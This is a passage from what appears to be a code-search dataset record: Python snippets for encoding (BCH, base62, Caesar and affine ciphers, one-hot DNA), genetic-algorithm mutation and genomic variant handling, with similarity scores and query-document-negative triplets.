BCH_encode(self,parameter,correcting_capability):\n\n bits = np.array(self.image_bits)\n code = komm.BCHCode(parameter,correcting_capability)\n \n if (len(bits)%code.dimension > 0):\n \n bits = np.append(bits, [np.zeros(self.calculate_zeros_addition_BCH(parameter,correcting_capability),dtype = np.uint8)])\n number_of_arrays = int(len(bits)/code.dimension)\n parts_to_encode = np.reshape(bits,(number_of_arrays,-1),order ='C')\n\n encoded_parts =[]\n for i in range (0, len(parts_to_encode)):\n encoded_part = code.encode(parts_to_encode[i])\n encoded_parts.append(encoded_part)\n encoded_parts = np.array(encoded_parts)\n\n return encoded_parts\n\n elif (len(bits)%code.dimension == 0):\n number_of_arrays = int(len(bits)/code.dimension)\n parts_to_encode = np.reshape(bits,(number_of_arrays,-1),order ='C')\n\n encoded_parts =[]\n for i in range (0, len(parts_to_encode)):\n encoded_part = code.encode(parts_to_encode[i])\n encoded_parts.append(encoded_part)\n encoded_parts = np.array(encoded_parts)\n\n return encoded_parts", "def encoder(ne, nj):\n #contrainte sup les equipes ne peuvent pas s'affronter elles-meme\n contrainte = ''\n for e in range(ne):\n for j in range(nj):\n contrainte += str(-codage(ne,nj,j,e,e))+' 0\\n'\n return contrainte+encoderC1(ne, nj) +'\\n'+ encoderC2(ne, nj)+'\\n'+ \\\n contrainteExtDimanche(ne,nj,0.5)+'\\n'+contrainteDomDimanche(ne,nj,0.4)+'\\n'+ \\\n contrainteExtConsecutif(ne,nj)+'\\n'+contrainteDomConsecutif(ne,nj)", "def encode_rna(x):\n return [0 if y == 'A' else 1 if y == 'U' else 2 if y == 'G' else 3 for y in x]", "def makeCode(self, code):\n\n current_charset = None\n pos = sum = 0\n skip = False\n strCode = ''\n for c in range(len(code)):\n if skip:\n skip = False\n continue\n\n # Only switch to char set C if next four chars are digits\n if len(code[c:]) >= 4 and code[c:c + 4].isdigit() and current_charset != self.CharSetC or \\\n len(code[c:]) >= 2 and code[c:c + 2].isdigit() and current_charset == self.CharSetC:\n # If char set C = current and next two chars ar digits, keep C\n if current_charset != self.CharSetC:\n # Switching to Character set C\n if pos:\n strCode += self.ValueEncodings[current_charset['Code C']]\n sum += pos * current_charset['Code C']\n else:\n strCode = self.ValueEncodings[self.CharSetC['START C']]\n sum = self.CharSetC['START C']\n current_charset = self.CharSetC\n pos += 1\n elif code[c] in self.CharSetB and current_charset != self.CharSetB and \\\n not (code[c] in self.CharSetA and current_charset == self.CharSetA):\n # If char in chrset A = current, then just keep that\n # Switching to Character set B\n if pos:\n strCode += self.ValueEncodings[current_charset['Code B']]\n sum += pos * current_charset['Code B']\n else:\n strCode = self.ValueEncodings[self.CharSetB['START B']]\n sum = self.CharSetB['START B']\n current_charset = self.CharSetB\n pos += 1\n elif code[c] in self.CharSetA and current_charset != self.CharSetA and \\\n not (code[c] in self.CharSetB and current_charset == self.CharSetB):\n # if char in chrset B== current, then just keep that\n # Switching to Character set A\n if pos:\n strCode += self.ValueEncodings[current_charset['Code A']]\n sum += pos * current_charset['Code A']\n else:\n strCode += self.ValueEncodings[self.CharSetA['START A']]\n sum = self.CharSetA['START A']\n current_charset = self.CharSetA\n pos += 1\n\n if current_charset == self.CharSetC:\n val = self.CharSetC[code[c:c + 2]]\n skip = True\n else:\n val = current_charset[code[c]]\n\n sum += pos * val\n strCode += self.ValueEncodings[val]\n pos += 1\n\n # Checksum\n checksum = sum % 103\n\n strCode += self.ValueEncodings[checksum]\n\n # The stop character\n strCode += self.ValueEncodings[current_charset['STOP']]\n\n # Termination bar\n strCode += \"11\"\n\n return strCode", "def chromosome_mutation(chromosome: str, nurses_number: int = 10):\n\n # The number of genes in the chromosome is generated\n genes = 21 * nurses_number\n\n # Random index to mutate\n index = randrange(0, genes)\n\n # New Chromosome to be returned\n new_chromosome = chromosome[:index]\n\n # Condition to mutate\n if chromosome[index] == '0':\n new_chromosome += '1'\n else:\n new_chromosome += '0'\n\n new_chromosome += chromosome[index + 1:]\n\n # Returning the new chromosome\n return new_chromosome", "def encode(record: int) -> str:\r\n result = ''\r\n queue = record\r\n while queue:\r\n remainder = queue % BASE\r\n queue = floor(queue / BASE)\r\n result = CODEX[remainder] + result\r\n return result", "def encode2(s,n):\n r = [ chr(((ord(x)-97+n)%26)+97) if x!=' ' else x for x in s]\n return \"\".join(r)", "def bin_code(self):\n self.alphabet = np.unique(self.sequence)\n\n for s, n in zip([chr(k + ord('a') - 1) for k in self.alphabet], self.alphabet):\n self.alphabet_symbol[s] = n\n\n sigm = len(self.alphabet)\n bin_code = []\n for i, e in enumerate(self.alphabet):\n em = [0] * sigm\n em[sigm - 1 - i] = 1\n bin_code.append(em)\n\n for i in range(len(bin_code)):\n self.alphabet_dict[self.alphabet[i]] = bin_code[i]\n\n return reduce(lambda r, e: r + self.alphabet_dict[e], self.sequence, [])", "def encode_right_to_left(self, index_in):\n\n char_out = self.mapping[index_in]\n index_out = self.pins.index(char_out)\n return char_out, index_out", "def encode(self, state):\n raise NotImplementedError", "def test_encode_pair():\n\tassert encode_pair(0, 0) == 0\n\tassert encode_pair(1, 0) == 1\n\tassert encode_pair(0, 1) == 2\n\tassert encode_pair(4, 6) == 207", "def encode(self, decoded):", "def __setitem__(self, index, chromosome):\n\n # Just one chromosome\n if isinstance(index, int):\n self.chromosome_list[index] = to_chromosome(chromosome)\n\n # Multiple chromosomes\n else:\n self.chromosome_list[index] = [to_chromosome(item) for item in chromosome]", "def encode(n):\n encode = []\n if n < 0:\n return ''\n while n >= 58:\n remainder = n % 58\n encode.append(LETTERS[remainder])\n n = n / 58\n if n:\n encode.append(LETTERS[n])\n return ''.join(reversed(encode))", "def _coord_to_bin(self,code):\n\t\tbinary = \"\"\n\t\tfor num in code:\n\t\t\tbinary += '{0:02b}'.format(int(num))\n\t\tassert ( len(binary) == 16 )\n\t\treturn binary", "def map_to_cigar(map):\n cigar = ''\n for span in map.spans:\n if isinstance(span, Span):\n num_chars = span.End-span.Start\n char = 'M'\n else:\n num_chars = span.length\n char = 'D'\n if num_chars == 1:\n cigar += char\n else:\n cigar += str(num_chars)+char\n return cigar", "def switch_chromosomes(mutated_genome):\n index1 = random.randint(0,max(0,len(mutated_genome)-1))\n index2 = random.randint(0,max(0,len(mutated_genome)-1))\n temp = mutated_genome[index1]\n mutated_genome[index1] = mutated_genome[index2]\n mutated_genome[index2] = temp", "def one_hot_encode_dna(dna_str, pad=None, base_order='ATCG'):\n dna_str = dna_str.upper()\n if pad is not None:\n M = pad\n else:\n M = len(dna_str)\n dna_arr = np.zeros((M, 4))\n for i in range(len(dna_str)):\n idx = base_order.index(dna_str[i])\n dna_arr[i, idx] = 1\n return dna_arr", "def buildCoder(shift):\n mapper={}\n for ch in string.ascii_lowercase:\n if (ord(ch)+shift)>ord('z'):\n mapper[ch]=chr(ord(ch)+shift-ord('z')+ord('a')-1)\n else:\n mapper[ch]=chr(ord(ch)+shift)\n for ch in string.ascii_uppercase:\n if (ord(ch)+shift)>ord('Z'):\n mapper[ch]=chr(ord(ch)+shift-ord('Z')+ord('A')-1)\n else:\n mapper[ch]=chr(ord(ch)+shift)\n return mapper", "def Codingfunc(N,L): #Coding:[N:number of repetitions, L:length of single/multiple sequence]\r\n C=0 #int variable containing code number\r\n if N==1:\r\n C=L-1\r\n else:\r\n C=-(L-1)*16-(N-1)\r\n #print(\"C =\",C,end=' ')\r\n \r\n return struct.pack('b',C)", "def GUI_Write_Encoder_Values(self):\n for i in range(3):\n self.encoder_text[i].set(\"%8s microns\"%str(self.read_pos[i]))\n return", "def encode(self, input_):\n return self.encoder(input_)", "def complement(chromosome, point1, point2):\r\n new_chromosome = \"\"\r\n\r\n for i in range(len(chromosome)):\r\n if i >= point1 and i <= point2:\r\n if chromosome[i] == '0':\r\n new_chromosome += '1'\r\n else:\r\n new_chromosome += '0'\r\n else:\r\n new_chromosome += chromosome[i]\r\n\r\n return new_chromosome", "def encode(self, peptides):\n raise NotImplementedError", "def encode(self, value):\r\n pass", "def encode(num, alphabet=BASE62):\n if num == 0:\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n num, rem = divmod(num, base)\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def mutate_chromosome(mutated_genome):\n seed = random.randint(0,5)\n if len(mutated_genome) <= 1: seed = 0\n if seed == 0:\n insert_chromosome(mutated_genome)\n elif seed == 1:\n remove_chromosome(mutated_genome)\n elif seed == 2:\n switch_chromosomes(mutated_genome)\n elif seed == 3:\n shuffle_chromosomes(mutated_genome)\n elif seed == 4:\n increment_chromosome(mutated_genome)\n else: #seed == 5:\n decrement_chromosome(mutated_genome)", "def __encode_ordinal(self):\n for key, value in self.ord_dict.items():\n if key in self.train_df.columns:\n if self.test_df is not None:\n self.test_df[key + str(\"Encoded\")] = self.test_df[key].map(\n value\n )\n self.test_df[key + str(\"Encoded\")] = self.test_df[\n key + str(\"Encoded\")\n ].astype(\"category\")\n\n self.train_df[key + str(\"Encoded\")] = self.train_df[key].map(\n value\n )\n self.train_df[key + str(\"Encoded\")] = self.train_df[\n key + str(\"Encoded\")\n ].astype(\"category\")\n self.ord_cols.append(key + str(\"Encoded\"))", "def mutate(chromosome, p):\n code = {'0':'1', '1':'0'}\n return ''.join(code[num] if random() < p else num for num in chromosome)", "def encode(self, string):\n\n encoded = np.zeros((len(string), len(self.__chars)))\n\n for i, c in enumerate(string):\n encoded[i, self.__char2idx[c]] = 1\n\n return encoded", "def codage(nbr):\n\tmask=1\n\tresult=0\n\tfor index in range(len(G)):\n\t\tif ((mask<<index)&nbr) != 0:\n\t\t\tresult^=G[len(G)-index-1]\n\treturn result", "def _encode(self, dataset):\n if self._look_up is None: # if we are encoding training set\n self._look_up = dict() # initialize look-up table as empty\n for col in dataset:\n if not is_numeric_dtype(dataset[col]): # for each column that is not numeric\n for val, label in enumerate(dataset[col].unique()): # attach a encode value for each of its label\n self._look_up[label] = val # add that value to the lookup table\n # Problem: Try other method of pandas for this task\n\n dataset.replace(self._look_up, inplace=True)", "def _generate_character_map(self):\n self._ct = [-1] * 256\n index = 0\n for c_range in self._meta.character_ranges:\n for c_pos in range(c_range['min'], c_range['max'] + 1):\n self._ct[c_pos] = index\n index += 1", "def icd9tocci(df,col_icd='icd9'):\n cci9 = load_cci9()\n return df.merge(cci9,how='left',left_on=col_icd,right_on='ICD-9-CM CODE')", "def encode(data, code_book):\n return np.array([int(chunk, 2).to_bytes(-(-len(chunk) // 8), byteorder='big') for chunk in\n map(lambda tup: ''.join(tup), (lambda iterable: zip_longest(*[iter(iterable)] * 8, fillvalue=''))(\n ''.join(map(lambda x: code_book[x], data))))])", "def cod(self):\n raise NotImplementedError(\"base class called\")", "def chrNum(self, num):\n char = chr(num + 65) \n return char", "def encode(bits, nt_to_bits=None):\r\n if nt_to_bits is None:\r\n nt_to_bits = DEFAULT_GOLAY_NT_TO_BITS\r\n\r\n bits = numpy.array(bits).reshape((12, 1))\r\n\r\n # cheap way to do binary xor in matrix dot\r\n res = numpy.dot(DEFAULT_G.T, bits)\r\n codeword = divmod(res.ravel(), 2)[1]\r\n\r\n return _bits_to_seq(codeword, nt_to_bits)", "def encode(self, value):\n raise NotImplementedError()", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def base62_encode(num, alphabet=ALPHABET):\n if (num == 0):\n return alphabet[0]\n arr = []\n base = len(alphabet)\n while num:\n rem = num % base\n num = num // base\n arr.append(alphabet[rem])\n arr.reverse()\n return ''.join(arr)", "def to_index(self, char):\n return ord(char) - ord(\"A\") - 32", "def encode(self,b):\n raise NotImplementedError('subclasses must override encode()!')", "def encoder(self, inputs):\n pass", "def encode_affine(msg, a, b):\n \n #Code to numbers\n encoded_message = [ RVALUES[(a * VALUES[i] + b) % 26] for i in msg ]\n \n return ''.join(encoded_message)", "def rivine_binary_encode(self, encoder):\n pass", "def chr_mod(value: int) -> str:\n return Base64._CHARSET[value % len(Base64._CHARSET)]", "def terrainEncoded(self, request, result):\n pass", "def encode(self, strs):", "def encode(self, strs):", "def encode(self, encode_data, image):\r\n raise NotImplementedError(\"Not Implemented\")", "def encode(self):\n if self.ciphered:\n raise CipherError(\"already encoded.\")\n try:\n self.result = self.doEncode(self.msg,self.shift)\n except Exception as e:\n raise CipherError(\"encoding failure: {}.\".format(e))\n self.ciphered = True\n return self.result", "def Ncen(self, m):\n pass", "def get_single_location(chrom, pos):\n return CHROMOSOME_TO_CODE[chrom] * int(1e9) + pos", "def encode(self):\n\n ret = {}\n ret[DC] = ''.join(encode_huffman(v, self.layer_type)\n for v in self.diff_dc)\n ret[AC] = ''.join(encode_huffman(v, self.layer_type)\n for v in self.run_length_ac)\n return ret", "def to_ascii(self):\n code = self.build()\n for i, line in enumerate(code):\n code[i] = line.replace('1', '|').replace('0', '_')\n return '\\n'.join(code)", "def encode_canonical(pc, vec, ang):\n if len(ang.shape) == 1:\n ang = ang[:, np.newaxis]\n\n theta = np.arctan2(pc[1], pc[0])\n R = get_R(theta) # p_canonical = R * p_world\n vec_cano = R @ vec.T[..., np.newaxis] # (N, 3, 1)\n vec_cano = vec_cano[:, :, 0].T\n ang_cano = ang - theta[:, np.newaxis]\n\n return vec_cano, ang_cano", "def test_encoder(self):\n from sosbeacon.utils import number_encode\n\n number = 123\n encoded = number_encode(number)\n self.assertEqual(encoded, 'b6')", "def icd9toccs(df,col_icd='icd9'):\n ccs9 = load_ccs9()\n output = df.merge(ccs9,how='left',left_on=col_icd,right_on='ICD-9-CM CODE')\n if col_icd!='ICD-9-CM CODE':\n output.drop('ICD-9-CM CODE',axis=1,inplace=True)\n return output", "def encode(self,permutations=True,return_magic=False):\n def compact_encode2(data):\n \"\"\"Encode two columns of integers into a single column.\n\n This is like enmagic2 but results in smaller encoded values, because\n the original values are first replaced by indices into the sets of unique\n values.\n This encoding scheme is therefore usable for repeated application\n on multiple columns.\n\n The return value is the list of codes, the magic value used in encoding,\n and the two sets of uniq values for the columns, needed to restore the\n original data. Decoding can be done with compact_decode2.\n \"\"\"\n # We could use a single compaction vector?\n uniqa, posa = unique(data[:,0], return_inverse=True)\n uniqb, posb = unique(data[:,1], return_inverse=True)\n # We could insert the encoding directly here,\n # or use an encoding function with 2 arguments\n # to avoid the column_stack operation\n rt = column_stack([posa, posb])\n codes, magic = enmagic2(rt)\n return codes,magic,uniqa,uniqb\n \n \n if permutations:\n data = self.copy()\n data.sort(axis=1)\n else:\n data = self\n \n magic = []\n codes = data[:,0]\n for i in range(1,data.shape[1]):\n cols = column_stack([codes,data[:,i]])\n codes,mag,uniqa,uniqb = compact_encode2(cols)\n # insert at the front so we can process in order\n magic.insert(0,(mag,uniqa,uniqb))\n\n if return_magic:\n return codes,magic\n else:\n return codes", "def convert_to_one_letter_code_sing(seq):\n conversion = {\n \"GLY\": \"G\", \"PRO\": \"P\", \"VAL\": \"V\", \"ALA\": \"A\", \"LEU\": \"L\",\n \"ILE\": \"I\", \"MET\": \"M\", \"CYS\": \"C\", \"PHE\": \"F\", \"TYR\": \"Y\",\n \"TRP\": \"W\", \"HIS\": \"H\", \"ARG\": \"R\", \"LYS\": \"K\", \"GLN\": \"Q\",\n \"THR\": \"T\", \"ASP\": \"D\", \"ASN\": \"N\", \"SER\": \"S\", \"GLU\": \"E\"\n }\n n_seq = conversion[seq]\n return n_seq", "def rle_encoder(txt):\n if not txt:\n return ''\n c = txt[0]\n i = 1\n res = []\n for x in txt[1:]:\n if x == c:\n i += 1\n else:\n res.append((c,i))\n i = 1\n c = x\n res.append((c,i))\n return res", "def encode(self, x):\n return [self.vae[c_idx].encode(x[c_idx])\n for c_idx in range(self.n_channels)]", "def encoded(self):\n text, chars = self.chars()\n int2char = dict(enumerate(chars))\n char2int = {ch: ii for ii, ch in int2char.items()}\n encoded = np.array([char2int[ch] for ch in text])\n return encoded", "def one_hot_encoder(self, DNA_string):\n\n if self.selex_predict_str_adaptor != 0:\n DNA_string = \"A\" * self.selex_predict_str_adaptor + DNA_string + 'A' * self.selex_predict_str_adaptor\n\n trantab = DNA_string.maketrans('ACGT', '0123')\n str_arr = [\"\" for x in range(self.num_of_str)]\n for i in range(0, self.num_of_str): ##each substring goes to different element array\n str_arr[i] = DNA_string[i: i + self.selex_str_len]\n\n # if the \"ACGT\"\n # won't be added it will be impossible to convert sequnces which miss one of the letters\n str_arr[self.num_of_str - 1] = str_arr[self.num_of_str - 1] + \"ACGT\"\n\n final_str = list(\"\")\n for i in range(0, self.num_of_str):\n final_str += list(str_arr[i].translate(trantab))\n\n return to_categorical(final_str)[0:-4] # returns the matrix without the \"ACGT\"", "def _transform(self, original, coder):\n msg = list(original)\n for k in range(len(msg)):\n if 0x590 < ord(msg[k]) < 0xfb50:\n msg[k] = coder[msg[k]]\n return u\"\".join(msg)", "def compact_encode2(data):\n # We could use a single compaction vector?\n uniqa, posa = unique(data[:,0], return_inverse=True)\n uniqb, posb = unique(data[:,1], return_inverse=True)\n # We could insert the encoding directly here,\n # or use an encoding function with 2 arguments\n # to avoid the column_stack operation\n rt = column_stack([posa, posb])\n codes, magic = enmagic2(rt)\n return codes,magic,uniqa,uniqb" ]
[ "0.65794533", "0.62438995", "0.6232326", "0.62068266", "0.6048946", "0.5984779", "0.5922863", "0.5862185", "0.5761406", "0.57606995", "0.5690487", "0.56302047", "0.5617058", "0.5587301", "0.5558331", "0.5556066", "0.5555711", "0.55398685", "0.54918736", "0.54819953", "0.54703707", "0.5463835", "0.5463755", "0.5463755", "0.5438159", "0.5431525", "0.53654575", "0.5338962", "0.53365326", "0.5331119", "0.5315581", "0.53101516", "0.52976346", "0.524646", "0.52432257", "0.5233494", "0.5229954", "0.5220865", "0.5210746", "0.5186018", "0.51844954", "0.51713896", "0.5171244", "0.5170336", "0.5165672", "0.5159753", "0.51581496", "0.51541126", "0.51530856", "0.5137306", "0.5133604", "0.512666", "0.51228654", "0.5097099", "0.5077731", "0.5072858", "0.507135", "0.5058134", "0.50567347", "0.5055806", "0.5054859", "0.505343", "0.5052755", "0.5052421", "0.50424546", "0.5032052", "0.5031011", "0.50301135", "0.5027652", "0.5018498", "0.50068676", "0.50068676", "0.50068676", "0.50068676", "0.49989948", "0.49905893", "0.49903774", "0.4986125", "0.4979594", "0.4973181", "0.49667266", "0.4954327", "0.4954327", "0.4946451", "0.49455023", "0.4942511", "0.49413335", "0.4937866", "0.49348333", "0.49251735", "0.49181765", "0.4916183", "0.49115476", "0.4907151", "0.49019763", "0.49009752", "0.48976633", "0.48959404", "0.48913354", "0.48910168" ]
0.7192931
0
Get the mutated dna subsequence according to mutation specified by the variant_comb.
def get_sub_mut_dna(background_seq, coord, variant_comb, somatic_mutation_sub_dict, strand, gene_start): def _get_variant_pos_offset(variant_pos, coord_pair_list, strand): offset = 0 takes_effect = False for p1,p2 in coord_pair_list: if variant_pos >= p1 and variant_pos < p2: if strand == '+': offset += variant_pos - p1 else: offset += p2 - variant_pos - 1 takes_effect = True break else: offset = p2 - p1 return offset if takes_effect else np.nan real_coord = list(filter(lambda x: x is not np.nan and x != None, coord)) assert len(real_coord) % 2 == 0 coord_pair_list = list(zip(real_coord[::2], real_coord[1::2])) if strand == '+': sub_dna = ''.join([background_seq[pair[0] - gene_start:pair[1] - gene_start] for pair in coord_pair_list]) else: sub_dna = ''.join([background_seq[pair[0] - gene_start:pair[1] - gene_start][::-1] for pair in coord_pair_list]) if variant_comb is np.nan : # no mutation exist return sub_dna relative_variant_pos = [_get_variant_pos_offset(variant_ipos, coord_pair_list, strand) for variant_ipos in variant_comb] for i,variant_ipos in enumerate(variant_comb): mut_base = somatic_mutation_sub_dict[variant_ipos]['mut_base'] ref_base = somatic_mutation_sub_dict[variant_ipos]['ref_base'] pos = relative_variant_pos[i] if pos is not np.nan: sub_dna = sub_dna[:pos] + mut_base + sub_dna[pos+1:] return sub_dna
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_DNA_seq(mutant_position, all_lines):\n\n dna_lines = []\n for i in range(mutant_position + 2, len(all_lines)):\n line = all_lines[ i ]\n if not line:\n break\n\n line = line.replace(\"Variant sequence: \", \"\")\n dna_lines.append(line)\n return dna_lines", "def select_subsequence(emg):\n # Get locations of each word\n new_word_begins = np.hstack([[0], np.where(emg[\"word\"][1:] != emg[\"word\"][:-1])[0] + 1])\n #print(emg[\"word\"][new_word_begins])\n \n full_transcript = \" \".join(emg[\"word\"][new_word_begins]).replace(\"$\", \"\").strip()\n if len(new_word_begins) <= 3:\n return emg, full_transcript \n \n # Select a random subsequence -- at least length 1, or at least length 2 if $ at end/begin\n # is included, and guaranteed that begin comes before end\n end_word, start_word = -1, -1\n while (end_word <= start_word or \n end_word-start_word < 2 or \n end_word-start_word < 3 and (start_word == 0 or end_word == len(new_word_begins)-1)):\n start_word = np.random.randint(max(1, len(new_word_begins)-2))\n end_word = np.random.randint(start_word+1, len(new_word_begins))\n \n start_loc = new_word_begins[start_word]\n end_loc = new_word_begins[end_word]\n \n new_transcript = \" \".join(emg[\"word\"][new_word_begins][start_word:end_word]).replace(\"$\", \"\").strip()\n new_emg = emg[start_loc:end_loc]\n \n if len(new_emg) == 0:\n return emg, full_transcript\n else:\n return new_emg, new_transcript", "def count_variant(self, variant_dna, include_indels=True):\n if not re.match(\"^[ACGTNXacgtnx]+$\", variant_dna):\n raise ValueError(\n \"Variant DNA sequence contains unexpected \"\n \"characters [{}]\".format(self.name)\n )\n\n variant_dna = variant_dna.upper()\n\n if len(variant_dna) != len(self.wt.dna_seq):\n if self.aligner is not None:\n mutations = self.align_variant(variant_dna)\n else:\n return None\n else:\n mutations = list()\n for i in range(len(variant_dna)):\n if variant_dna[i] != self.wt.dna_seq[i]:\n mutations.append(\n (\n i,\n \"{pre}>{post}\".format(\n pre=self.wt.dna_seq[i], post=variant_dna[i]\n ),\n )\n )\n if len(mutations) > self.max_mutations:\n if self.aligner is not None:\n mutations = self.align_variant(variant_dna)\n if len(mutations) > self.max_mutations:\n # too many mutations post-alignment\n return None\n else:\n # stop looping over this variant\n break\n else:\n # too many mutations and not using aligner\n return None\n\n mutation_strings = list()\n if self.is_coding():\n variant_protein = \"\"\n for i in range(0, len(variant_dna), 3):\n try:\n variant_protein += CODON_TABLE[variant_dna[i : i + 3]]\n except KeyError: # garbage codon due to indel, X, or N\n variant_protein += \"?\"\n\n for pos, change in mutations:\n ref_dna_pos = pos + self.wt.dna_offset + 1\n ref_pro_pos = pos // 3 + self.wt.protein_offset + 1\n mut = \"c.{pos}{change}\".format(pos=ref_dna_pos, change=change)\n if has_indel(change):\n mut += \" (p.{pre}{pos}fs)\".format(\n pre=AA_CODES[self.wt.protein_seq[pos // 3]], pos=ref_pro_pos\n )\n elif variant_protein[pos // 3] == self.wt.protein_seq[pos // 3]:\n mut += \" (p.=)\"\n else:\n mut += \" (p.{pre}{pos}{post})\".format(\n pre=AA_CODES[self.wt.protein_seq[pos // 3]],\n pos=ref_pro_pos,\n post=AA_CODES[variant_protein[pos // 3]],\n )\n mutation_strings.append(mut)\n else:\n for pos, change in mutations:\n ref_dna_pos = pos + self.wt.dna_offset + 1\n mut = \"n.{pos}{change}\".format(pos=ref_dna_pos, change=change)\n mutation_strings.append(mut)\n\n if len(mutation_strings) > 0:\n variant_string = \", \".join(mutation_strings)\n else:\n variant_string = WILD_TYPE_VARIANT\n return variant_string", "def _get_variant(mut_dat, variant, item, all_except=False):\n assert item in mut_dat[variant].unique(), \"{0} not found, options are: {1}\".format(item, mut_dat[variant].unique())\n\n\n if isinstance(item, collections.Iterable) and not isinstance(item, six.string_types):\n method = lambda x,y: mut_dat.loc[mut_dat[x].isin(y)]\n\n else:\n cases = {True: lambda x, y: mut_dat.loc[~(mut_dat[x] == y)],\n False: lambda x, y: mut_dat.loc[mut_dat[x] == y]}\n method = cases[all_except]\n\n return method(variant, item)", "def get_seq(self):\n \n dna_seq = self.gene.polymer.get_subseq(\n start=self.gene.start, end=self.gene.end, strand=self.gene.strand)\n \n return dna_seq.transcribe()", "def genomic_sub_grch38():\n params = {\n \"id\": \"normalize.variation:NC_000007.13%3Ag.55249071C%3ET\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.1ewlywoD423K7YH_K4YefZg6J_87pQTp\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.1ewlywoD423K7YH_K4YefZg6J_87pQTp\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.0p1nWj9-sryfUD5jvPTZZdnZeiHVHXls\",\n \"interval\": {\n \"end\": {\"value\": 55181378, \"type\": \"Number\"},\n \"start\": {\"value\": 55181377, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"T\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0001483\",\n \"vrs_ref_allele_seq\": \"C\"\n }\n return VariationDescriptor(**params)", "def extract_hgvs_cdna(self, variant_name, clinvar_set_el):\n hgvs_cand = re.sub(r\"\\(\" + \"(BRCA[1|2])\" + r\"\\)\",\n \"\", variant_name.split()[0])\n\n # only take variants starting with NM_ and not containing []\n hgvs_cdna_re = r'NM_.*:[^\\[]*$'\n\n if not re.match(hgvs_cdna_re, hgvs_cand):\n # taking Attribute of 'HGVS', 'HGVS, coding' or 'HGVS, coding, RefSeq' in\n # both ReferenceClinVarAssertion and ClinVarAssertion's\n hgvs_candidates = [ev.text for ev in clinvar_set_el.findall('.//Measure/AttributeSet/Attribute')\n if ev.attrib['Type'].startswith('HGVS, coding') or ev.attrib['Type'] == 'HGVS']\n\n filtered = [s for s in hgvs_candidates if re.match(hgvs_cdna_re, s)]\n if filtered:\n return filtered[0]\n\n return hgvs_cand", "def mutate(self, dna):\n new_dna = []\n for c in range(self.DNA_SIZE):\n if int(random.random()*self.mutation_chance)==1:\n if random.random() >= 0.5:\n new_dna.append(round(dna[c]+self.mutation_factor, 2))\n else:\n new_dna.append(round(dna[c]-self.mutation_factor, 2))\n else:\n new_dna.append(round(dna[c], 2))\n return new_dna", "def get_mutated_sequence(focus_seq, mutant, start_idx=1, AA_vocab=AA_vocab):\n mutated_seq = list(focus_seq)\n for mutation in mutant.split(\":\"):\n try:\n from_AA, position, to_AA = mutation[0], int(mutation[1:-1]), mutation[-1]\n except:\n print(\"Issue with mutant: \"+str(mutation))\n relative_position = position - start_idx\n assert (from_AA==focus_seq[relative_position]), \"Invalid from_AA or mutant position: \"+str(mutation)+\" from_AA: \"+str(from_AA) + \" relative pos: \"+str(relative_position) + \" focus_seq: \"+str(focus_seq)\n assert (to_AA in AA_vocab) , \"Mutant to_AA is invalid: \"+str(mutation)\n mutated_seq[relative_position] = to_AA\n return \"\".join(mutated_seq)", "async def test_coding_dna_and_genomic_substitution(\n test_handler, braf_v600e_nucleotide, genomic_substitution,\n genomic_sub_grch38, egfr_grch38_sub, grch38_braf_genom_sub):\n resp = await test_handler.normalize(\"NM_004333.4:c.1799T>A\")\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"NM_004333.4:c.1799T>A\")\n\n # MANE transcript\n refseq_id = \"normalize.variation:NM_004333.4%3Ac.1799T%3EA\"\n\n # TODO: Check if this should return a different VRS object?\n resp = await test_handler.normalize(\"ENST00000288602.10:c.1799T>A\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:ENST00000288602.10%3Ac.1799T%3EA\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"ENST00000288602.10:c.1799T>A\")\n\n resp = await test_handler.normalize(\"BRAF V600E c.1799T>A\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:BRAF%20V600E%20c.1799T%3EA\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF V600E c.1799T>A\")\n\n resp = await test_handler.normalize(\"BRAF V600E (c.1799T>A)\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:BRAF%20V600E%20%28c.1799T%3EA%29\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF V600E (c.1799T>A)\")\n\n resp = await test_handler.normalize(\"BRAF c.1799T>A\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20c.1799T%3EA\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide, \"BRAF c.1799T>A\")\n\n resp = await test_handler.normalize(\"NC_000007.13:g.140453136A>T\")\n assertion_checks(resp.variation_descriptor, grch38_braf_genom_sub,\n \"NC_000007.13:g.140453136A>T\")\n\n fixture_id = \"normalize.variation:NC_000007.13%3Ag.140453136A%3ET\"\n resp = await test_handler.normalize(\"7-140453136-A-T\") # 37\n assert resp.variation_descriptor.id == \"normalize.variation:7-140453136-A-T\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, 